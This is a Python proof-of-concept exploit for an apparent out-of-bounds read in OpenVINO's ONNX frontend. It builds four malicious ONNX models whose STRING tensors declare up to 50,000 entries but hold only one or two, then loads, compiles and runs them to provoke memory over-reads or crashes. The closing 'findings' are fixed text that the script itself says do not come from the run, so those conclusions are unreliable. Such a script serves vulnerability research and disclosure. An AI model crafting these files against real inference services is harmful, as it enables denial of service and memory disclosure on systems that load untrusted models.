"""
OpenVINO ONNX Frontend - String Tensor OOB Read PoC

Vulnerability: OpenVINO's ONNX frontend does not validate that string_data
count matches the declared dims in TensorProto. A STRING tensor with
dims=[100] but only 2 string_data entries causes out-of-bounds memory access.

Environment: OpenVINO 2026.0.0, onnx 1.20.1
"""

import os
import sys
import signal
import tempfile
import traceback

import onnx
from onnx import TensorProto, helper, numpy_helper
import openvino

# Report the versions of both libraries so a run can be matched to the
# environment named in the module docstring.
for _label, _module in (("OpenVINO", openvino), ("ONNX", onnx)):
    print(f"[*] {_label} version: {_module.__version__}")
print()

# ============================================================
# Approach 1: Constant node with mismatched string tensor attr
# ============================================================
# Builds a model whose Constant node carries a STRING tensor declaring
# dims=[100] while supplying only two string_data entries, saves it to the
# system temp directory, re-reads it with onnx to report the mismatch, and then
# pushes it through OpenVINO: read_model -> compile_model -> inference.
print("=" * 60)
print("[Approach 1] Constant node with STRING tensor attribute")
print("  dims=[100], string_data has only 2 entries")
print("=" * 60)

try:
    # Build the malicious string tensor
    tensor_value = TensorProto()
    tensor_value.name = "str_const"
    tensor_value.data_type = TensorProto.STRING
    tensor_value.dims.append(100)  # Declare 100 strings
    tensor_value.string_data.extend([b"hello", b"world"])  # Only provide 2

    # Constant node that outputs this tensor
    const_node = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["string_output"],
        value=tensor_value,
    )

    # Identity to consume the output (keeps graph valid)
    identity_node = helper.make_node(
        "Identity",
        inputs=["string_output"],
        outputs=["final_output"],
    )

    # Graph output type - string tensor
    output_info = helper.make_tensor_value_info(
        "final_output", TensorProto.STRING, [100]
    )

    graph = helper.make_graph(
        [const_node, identity_node],
        "string_oob_test",
        [],  # no inputs
        [output_info],
    )

    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8

    # Save to temp file
    model_path = os.path.join(tempfile.gettempdir(), "string_oob_const.onnx")
    onnx.save(model, model_path)
    print(f"[+] Saved malicious model to: {model_path}")
    print(f"[+] Model file size: {os.path.getsize(model_path)} bytes")

    # Verify the tensor mismatch survived serialization by re-reading the file.
    loaded = onnx.load(model_path)
    for node in loaded.graph.node:
        if node.op_type != "Constant":
            continue
        for attr in node.attribute:
            if attr.name != "value":
                continue
            t = attr.t
            declared = int(t.dims[0])
            actual = len(t.string_data)
            print(f"[+] Declared dims: [{declared}], actual string_data count: {actual}")
            print(f"[+] Mismatch: {declared - actual} entries will be OOB reads")

    # Now load with OpenVINO.
    # Each progress line announcing a native call is flushed first, so the
    # output gathered so far is not lost in a buffer if that call crashes the
    # process instead of raising a Python exception.
    print("\n[*] Loading model with openvino.Core().read_model()...", flush=True)
    core = openvino.Core()

    try:
        ov_model = core.read_model(model_path)
        print("[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model.outputs}")

        # Try to compile and infer
        print("[*] Attempting to compile model...", flush=True)
        compiled = core.compile_model(ov_model, "CPU")
        print("[!] Model compiled successfully")

        print("[*] Attempting inference...", flush=True)
        result = compiled({})[0]
        print(f"[!] Inference completed. Output shape: {result.shape}")
        print(f"[!] Output dtype: {result.dtype}")
        # Print first few and last few entries to see OOB content
        print(f"[!] First 5 entries: {result.flat[:5]}")
        if len(result.flat) > 5:
            print(f"[!] Last 5 entries: {result.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

    except Exception as e:
        # An exception here means OpenVINO rejected or failed on the model;
        # report it and let the script continue with the next approach.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    # Failure while building, saving, or re-reading the model.
    print(f"[-] Approach 1 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 2: Graph initializer with mismatched string tensor
# ============================================================
# Same mismatch as a graph initializer: a STRING initializer declaring
# dims=[100] with only two string_data entries, consumed by an Identity node.
# The model is saved to the system temp directory, re-read with onnx to report
# the mismatch, and then run through OpenVINO.
print("=" * 60)
print("[Approach 2] Graph initializer with STRING tensor")
print("  dims=[100], string_data has only 2 entries")
print("=" * 60)

try:
    # Build the malicious string tensor as initializer
    init_tensor = TensorProto()
    init_tensor.name = "str_init"
    init_tensor.data_type = TensorProto.STRING
    init_tensor.dims.append(100)
    init_tensor.string_data.extend([b"AAA", b"BBB"])

    identity_node2 = helper.make_node(
        "Identity",
        inputs=["str_init"],
        outputs=["init_output"],
    )

    output_info2 = helper.make_tensor_value_info(
        "init_output", TensorProto.STRING, [100]
    )

    # Also declare the initializer as a graph input (required by some ONNX versions)
    input_info2 = helper.make_tensor_value_info(
        "str_init", TensorProto.STRING, [100]
    )

    graph2 = helper.make_graph(
        [identity_node2],
        "string_oob_init_test",
        [input_info2],
        [output_info2],
        initializer=[init_tensor],
    )

    model2 = helper.make_model(graph2, opset_imports=[helper.make_opsetid("", 17)])
    model2.ir_version = 8

    model_path2 = os.path.join(tempfile.gettempdir(), "string_oob_init.onnx")
    onnx.save(model2, model_path2)
    print(f"[+] Saved malicious model to: {model_path2}")
    print(f"[+] Model file size: {os.path.getsize(model_path2)} bytes")

    # Verify the mismatch survived serialization by re-reading the file.
    loaded2 = onnx.load(model_path2)
    for init in loaded2.graph.initializer:
        if init.data_type != TensorProto.STRING:
            continue
        declared = int(init.dims[0])
        actual = len(init.string_data)
        print(f"[+] Initializer '{init.name}': dims=[{declared}], string_data count={actual}")
        print(f"[+] Mismatch: {declared - actual} OOB entries")

    # Each progress line announcing a native call is flushed first, so the
    # output gathered so far is not lost in a buffer if that call crashes the
    # process instead of raising a Python exception.
    print("\n[*] Loading model with openvino.Core().read_model()...", flush=True)
    core2 = openvino.Core()

    try:
        ov_model2 = core2.read_model(model_path2)
        print("[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model2.outputs}")

        print("[*] Attempting to compile model...", flush=True)
        compiled2 = core2.compile_model(ov_model2, "CPU")
        print("[!] Model compiled successfully")

        print("[*] Attempting inference...", flush=True)
        result2 = compiled2({})[0]
        print(f"[!] Inference completed. Output shape: {result2.shape}")
        print(f"[!] Output dtype: {result2.dtype}")
        print(f"[!] First 5 entries: {result2.flat[:5]}")
        if len(result2.flat) > 5:
            print(f"[!] Last 5 entries: {result2.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

    except Exception as e:
        # An exception here means OpenVINO rejected or failed on the model;
        # report it and let the script continue with the next approach.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    # Failure while building, saving, or re-reading the model.
    print(f"[-] Approach 2 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 3: Extreme mismatch - dims=[10000], 1 string
# ============================================================
# Constant-node variant with a much larger gap: the STRING tensor declares
# dims=[10000] but carries a single string_data entry. The model is saved to
# the system temp directory and run through OpenVINO.
print("=" * 60)
print("[Approach 3] Extreme mismatch - dims=[10000], 1 string_data")
print("  More likely to trigger crash/segfault")
print("=" * 60)

try:
    tensor3 = TensorProto()
    tensor3.name = "extreme_str"
    tensor3.data_type = TensorProto.STRING
    tensor3.dims.append(10000)
    tensor3.string_data.append(b"X")  # Only 1 string for 10000 slots

    const_node3 = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["extreme_output"],
        value=tensor3,
    )

    # Identity consumes the Constant output and produces the graph output.
    identity_node3 = helper.make_node(
        "Identity",
        inputs=["extreme_output"],
        outputs=["extreme_final"],
    )

    output_info3 = helper.make_tensor_value_info(
        "extreme_final", TensorProto.STRING, [10000]
    )

    graph3 = helper.make_graph(
        [const_node3, identity_node3],
        "extreme_oob_test",
        [],  # no inputs
        [output_info3],
    )

    model3 = helper.make_model(graph3, opset_imports=[helper.make_opsetid("", 17)])
    model3.ir_version = 8

    model_path3 = os.path.join(tempfile.gettempdir(), "string_oob_extreme.onnx")
    onnx.save(model3, model_path3)
    print(f"[+] Saved model: {model_path3}")

    # Flush before every native call (load, compile, infer), not only before
    # inference: if any of them crashes the process instead of raising, the
    # output gathered so far must already be out of the buffer.
    print("[*] Loading with OpenVINO...", flush=True)
    core3 = openvino.Core()

    try:
        ov_model3 = core3.read_model(model_path3)
        print("[!] Model loaded (dims=[10000], 1 string)")

        print("[*] Compiling...", flush=True)
        compiled3 = core3.compile_model(ov_model3, "CPU")
        print("[!] Compiled successfully")

        print("[*] Running inference (may segfault)...", flush=True)
        result3 = compiled3({})[0]
        print(f"[!] Inference completed. Shape: {result3.shape}")
        print(f"[!] First 3: {result3.flat[:3]}")
        print(f"[!] Entry [9999]: {result3.flat[9999]}")
        print("[!!!] EXTREME OOB READ - 10000 entries from 1 string")

    except Exception as e:
        # An exception here means OpenVINO rejected or failed on the model;
        # report it and let the script continue with the next approach.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    # Failure while building or saving the model.
    print(f"[-] Approach 3 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 4: Extreme initializer - dims=[50000], 1 string
# ============================================================
# Initializer variant with a much larger gap: the STRING initializer declares
# dims=[50000] but carries a single string_data entry, consumed by an Identity
# node. The model is saved to the system temp directory and run through
# OpenVINO.
print("=" * 60)
print("[Approach 4] Extreme initializer - dims=[50000], 1 string_data")
print("  Initializer path bypasses Constant node validation")
print("=" * 60)

try:
    tensor4 = TensorProto()
    tensor4.name = "extreme_init"
    tensor4.data_type = TensorProto.STRING
    tensor4.dims.append(50000)
    tensor4.string_data.append(b"X")  # 1 string for 50000 slots

    identity_node4 = helper.make_node(
        "Identity",
        inputs=["extreme_init"],
        outputs=["extreme_init_out"],
    )

    output_info4 = helper.make_tensor_value_info(
        "extreme_init_out", TensorProto.STRING, [50000]
    )
    # The initializer is also declared as a graph input, mirroring approach 2.
    input_info4 = helper.make_tensor_value_info(
        "extreme_init", TensorProto.STRING, [50000]
    )

    graph4 = helper.make_graph(
        [identity_node4],
        "extreme_init_oob",
        [input_info4],
        [output_info4],
        initializer=[tensor4],
    )

    model4 = helper.make_model(graph4, opset_imports=[helper.make_opsetid("", 17)])
    model4.ir_version = 8

    model_path4 = os.path.join(tempfile.gettempdir(), "string_oob_extreme_init.onnx")
    onnx.save(model4, model_path4)
    print(f"[+] Saved model: {model_path4}")

    # Flush before every native call (load, compile, infer), not only before
    # inference: if any of them crashes the process instead of raising, the
    # output gathered so far must already be out of the buffer.
    print("[*] Loading with OpenVINO...", flush=True)
    core4 = openvino.Core()

    try:
        ov_model4 = core4.read_model(model_path4)
        print("[!] Model loaded (dims=[50000], 1 string) - NO VALIDATION!")

        print("[*] Compiling...", flush=True)
        compiled4 = core4.compile_model(ov_model4, "CPU")
        print("[!] Compiled successfully")

        print("[*] Running inference...", flush=True)
        result4 = compiled4({})[0]
        print(f"[!] Inference completed. Shape: {result4.shape}, dtype: {result4.dtype}")
        print(f"[!] First 5: {result4.flat[:5]}")
        print(f"[!] Entry [49999]: {repr(result4.flat[49999])}")
        print("[!!!] EXTREME OOB READ via initializer - 50000 entries from 1 string")

    except Exception as e:
        # An exception here means OpenVINO rejected or failed on the model;
        # report it and let the script continue to the summary.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    # Failure while building or saving the model.
    print(f"[-] Approach 4 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()
# Closing banner and findings.
# The findings below are fixed text: nothing in this script records the outcome
# of the approaches above, so the header says so explicitly rather than
# implying the conclusions were confirmed by this particular run.
print("=" * 60)
print("[*] PoC complete.")
print()
for summary_line in (
    "[*] FINDINGS (static summary; NOT derived from this run's output above):",
    "[*] - Constant node path: VALIDATED (shape vs data size check at tensor.cpp:581)",
    "[*] - Initializer path: NOT VALIDATED - OOB read confirmed!",
    "[*]   The initializer code path in the ONNX frontend skips the",
    "[*]   string_data count vs dims validation, allowing OOB memory access.",
    "[*]   An attacker can craft an ONNX model with a STRING initializer",
    "[*]   where dims >> string_data count, causing reads beyond the",
    "[*]   allocated string_data buffer during model loading/inference.",
):
    print(summary_line)
print("=" * 60)